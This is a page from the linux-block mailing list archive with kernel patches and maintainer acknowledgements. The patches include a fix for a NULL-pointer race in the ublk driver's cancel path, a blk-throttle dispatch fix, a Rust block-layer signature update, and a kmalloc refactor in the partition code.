> ublk_uring_cmd_cancel_fn().
> 
> [...]

Applied, thanks!

[1/1] ublk: set canceling flag even when disk is not allocated
      commit: 1133b93fc7f63defaa2c07d5f49873c14bb74681

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* [PATCH] ublk: set canceling flag even when disk is not allocated
From: Ming Lei @ 2026-05-27 14:40 UTC (permalink / raw)
  To: Jens Axboe, linux-block; +Cc: Caleb Sander Mateos, Uday Shankar, Ming Lei

ublk_start_cancel() previously bailed out early when ublk_get_disk()
returned NULL, treating it as "our disk has been dead".  That is correct
for the post-teardown case, but it also wrongly covers the pre-start
case: ublk_ctrl_start_dev() has not assigned ub->ub_disk yet, while
io_uring is already tearing down the daemon's uring_cmds via
ublk_uring_cmd_cancel_fn().

In that window, the cancel path skips ublk_set_canceling(), so
ubq->canceling stays false, even though ublk_cancel_cmd() goes on to
NULL out every io->cmd.  ublk_ctrl_start_dev() then proceeds to set
ub->ub_disk, call add_disk(), and schedule partition_scan_work.  When
ublk_partition_scan_work() runs bdev_disk_changed() and the resulting
read reaches ublk_queue_rq() -> ublk_queue_cmd(), the ubq->canceling
check passes and the code dereferences the NULL io->cmd:

  BUG: kernel NULL pointer dereference, address: 0000000000000018
  RIP: ublk_queue_cmd drivers/block/ublk_drv.c [inline]
  RIP: ublk_queue_rq+0x73/0x100
  Call Trace:
   blk_mq_dispatch_rq_list+0x1c5/0xca0
   ...
   bdev_disk_changed+0x3d4/0x5e0
   ublk_partition_scan_work+0x89/0xe0
   process_one_work+0x344/0x8a0

Fix it by always setting ub->canceling / ubq->canceling under
cancel_mutex.  When the disk is allocated, keep the existing
quiesce/unquiesce dance so the flag is observed across the
ublk_queue_rq() barrier.  When the disk is not yet allocated, there is
no request_queue and ublk_queue_rq() cannot be running concurrently, so
simply flipping the flag is sufficient: any subsequent I/O - including
the partition scan started by ublk_ctrl_start_dev() - will see
canceling set and be aborted via __ublk_queue_rq_common().

Fixes: 7fc4da6a304b ("ublk: scan partition in async way")
Signed-off-by: Ming Lei <tom.leiming@gmail.com>
---
 drivers/block/ublk_drv.c | 32 ++++++++++++++++++--------------
 1 file changed, 18 insertions(+), 14 deletions(-)

diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
index a08593b9f862..4f6d9e652187 100644
--- a/drivers/block/ublk_drv.c
+++ b/drivers/block/ublk_drv.c
@@ -2727,23 +2727,27 @@ static void ublk_start_cancel(struct ublk_device *ub)
 {
 	struct gendisk *disk = ublk_get_disk(ub);

-	/* Our disk has been dead */
-	if (!disk)
-		return;
-
 	mutex_lock(&ub->cancel_mutex);
 	if (ub->canceling)
 		goto out;
-	/*
-	 * Now we are serialized with ublk_queue_rq()
-	 *
-	 * Make sure that ubq->canceling is set when queue is frozen,
-	 * because ublk_queue_rq() has to rely on this flag for avoiding to
-	 * touch completed uring_cmd
-	 */
-	blk_mq_quiesce_queue(disk->queue);
-	ublk_set_canceling(ub, true);
-	blk_mq_unquiesce_queue(disk->queue);
+
+	if (disk) {
+		/*
+		 * Quiesce to serialize with ublk_queue_rq(), ensuring
+		 * ubq->canceling is visible when the queue resumes.
+		 */
+		blk_mq_quiesce_queue(disk->queue);
+		ublk_set_canceling(ub, true);
+		blk_mq_unquiesce_queue(disk->queue);
+	} else {
+		/*
+		 * Disk not yet allocated by ublk_ctrl_start_dev(), so
+		 * there is no request queue and ublk_queue_rq() cannot
+		 * be running.  Just set the flag; if start_dev proceeds
+		 * later, new I/O will see canceling and be aborted.
+		 */
+		ublk_set_canceling(ub, true);
+	}
 out:
 	mutex_unlock(&ub->cancel_mutex);
 	ublk_put_disk(disk);
-- 
2.54.0

^ permalink raw reply related

* Re: [PATCH v2] blk-throttle: schedule parent dispatch in tg_flush_bios()
From: Jens Axboe @ 2026-05-27 14:38 UTC (permalink / raw)
  To: tj, josef, cgroups, Tao Cui; +Cc: linux-block, Shin'ichiro Kawasaki
In-Reply-To: <20260522091530.1901437-1-cuitao@kylinos.cn>


On Fri, 22 May 2026 17:15:30 +0800, Tao Cui wrote:
> tg_flush_bios() schedules pending_timer on the child tg's own
> service_queue, which causes throtl_pending_timer_fn() to dispatch from
> the child's pending_tree.  For leaf cgroups this tree is empty, so the
> timer fires and exits without dispatching the throttled bio.
> 
> The throttled bio sits in the parent's pending_tree with disptime set
> to jiffies (THROTL_TG_CANCELING zeroes all dispatch times), but the
> parent's timer is never explicitly rescheduled.  The bio only gets
> dispatched when the parent timer eventually fires at its previously
> scheduled expiry.
> 
> [...]

Applied, thanks!

[1/1] blk-throttle: schedule parent dispatch in tg_flush_bios()
      commit: 6235ea3f8b8ffca0333ade0863992f3cd69592ea

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* Re: [PATCH] rust: block: mq: align init_request numa_node arg with C signature
From: Jens Axboe @ 2026-05-27 14:37 UTC (permalink / raw)
  To: Boqun Feng, Miguel Ojeda, Gary Guo, Björn Roy Baron,
	Benno Lossin, Alice Ryhl, Trevor Gross, Danilo Krummrich,
	Andreas Hindborg
  Cc: Mateusz Nowicki, linux-block, rust-for-linux, linux-kernel
In-Reply-To: <20260527-block-for-next-2026-05-26-2200-failure-v1-1-4865889e282c@kernel.org>


On Wed, 27 May 2026 11:18:09 +0200, Andreas Hindborg wrote:
> Commit b040a1a4523d ("block: switch numa_node to int in
> blk_mq_hw_ctx and init_request") changed the type of the
> `numa_node` argument of `blk_mq_ops::init_request` from
> `unsigned int` to `int`. Update the Rust callback signature to
> match, so that the function item can be coerced to the C fn
> pointer type stored in `blk_mq_ops`.
> 
> [...]

Applied, thanks!

[1/1] rust: block: mq: align init_request numa_node arg with C signature
      commit: 6b2f3e4970e48e70c10111366f59f908f2ea6f96

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* Re: [PATCH v2] block: partitions: replace __get_free_page() with kmalloc()
From: Jens Axboe @ 2026-05-27 14:37 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Christoph Hellwig, Hannes Reinecke, Matthew Wilcox,
	Vlastimil Babka, linux-block, linux-kernel, linux-mm
In-Reply-To: <20260527-block-v2-1-8e06f914c484@kernel.org>


On Wed, 27 May 2026 17:33:28 +0300, Mike Rapoport (Microsoft) wrote:
> check_partition() allocates a buffer to use as backing memory for
> seq_buf.
> 
> This buffer can be allocated with kmalloc() as there's nothing special
> about it to go directly to the page allocator.
> 
> kmalloc() provides a better API that does not require ugly casts and
> kfree() does not need to know the size of the freed object.
> 
> [...]

Applied, thanks!

[1/1] block: partitions: replace __get_free_page() with kmalloc()
      commit: 17d7492a50251d913ae7101f898cf30ede856cde

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* [PATCH v2] block: partitions: replace __get_free_page() with kmalloc()
From: Mike Rapoport (Microsoft) @ 2026-05-27 14:33 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Christoph Hellwig, Hannes Reinecke, Matthew Wilcox, Mike Rapoport,
	Vlastimil Babka, linux-block, linux-kernel, linux-mm

check_partition() allocates a buffer to use as backing memory for
seq_buf.

This buffer can be allocated with kmalloc() as there's nothing special
about it to go directly to the page allocator.

kmalloc() provides a better API that does not require ugly casts and
kfree() does not need to know the size of the freed object.

For a single allocation on the cold path the performance difference between
kmalloc() and __get_free_pages() is not measurable as both allocators take
an object/page from a per-CPU list for fast path allocations.

For the slow path the performance is anyway determined by the amount of
reclaim involved rather than by what allocator is used.

Replace use of __get_free_page() with kmalloc() and free_page() with
kfree().

Link: https://lore.kernel.org/all/635405e4-9423-4a25-a6e7-e03c8ea0bcbe@redhat.com
Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
---
This is a (tiny) part of larger work of replacing page allocator calls
with kmalloc:

Also in git:
https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/block

Signed-off-by: Mike Rapoport <rppt@kernel.org>
---
v2 changes:
* reword changelog

To: Jens Axboe <axboe@kernel.dk>
Cc: linux-block@vger.kernel.org
Cc: linux-kernel@vger.kernel.org
v1: https://patch.msgid.link/20260520-block-v1-1-6463dc2cf042@kernel.org
---
 block/partitions/core.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/block/partitions/core.c b/block/partitions/core.c
index 5d5332ce586b..b5c59b79ca7c 100644
--- a/block/partitions/core.c
+++ b/block/partitions/core.c
@@ -124,7 +124,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 	state = allocate_partitions(hd);
 	if (!state)
 		return NULL;
-	state->pp_buf.buffer = (char *)__get_free_page(GFP_KERNEL);
+	state->pp_buf.buffer = kmalloc(PAGE_SIZE, GFP_KERNEL);
 	if (!state->pp_buf.buffer) {
 		free_partitions(state);
 		return NULL;
@@ -154,7 +154,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 	if (res > 0) {
 		printk(KERN_INFO "%s", seq_buf_str(&state->pp_buf));
 
-		free_page((unsigned long)state->pp_buf.buffer);
+		kfree(state->pp_buf.buffer);
 		return state;
 	}
 	if (state->access_beyond_eod)
@@ -170,7 +170,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 		printk(KERN_INFO "%s", seq_buf_str(&state->pp_buf));
 	}
 
-	free_page((unsigned long)state->pp_buf.buffer);
+	kfree(state->pp_buf.buffer);
 	free_partitions(state);
 	return ERR_PTR(res);
 }

---
base-commit: 5d6919055dec134de3c40167a490f33c74c12581
change-id: 20260520-block-25582753fd38

Best regards,
--  
Sincerely yours,
Mike.


^ permalink raw reply related

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox